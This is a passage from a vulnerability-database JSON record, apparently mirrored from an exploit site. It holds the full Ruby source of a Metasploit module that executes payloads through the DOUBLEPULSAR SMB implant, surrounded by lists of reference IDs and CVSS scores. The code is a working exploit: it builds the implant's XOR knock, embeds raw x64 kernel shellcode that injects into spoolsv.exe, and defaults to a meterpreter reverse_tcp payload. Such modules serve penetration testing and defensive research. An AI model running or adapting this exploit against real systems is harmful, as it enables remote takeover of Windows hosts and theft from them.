"AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:16:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-08T00:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:22:06", "differentElements": ["sourceData"], "edition": 39}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "06492ccaa33874b49c69fb33b7c1927d", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-11T00:22:25", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": 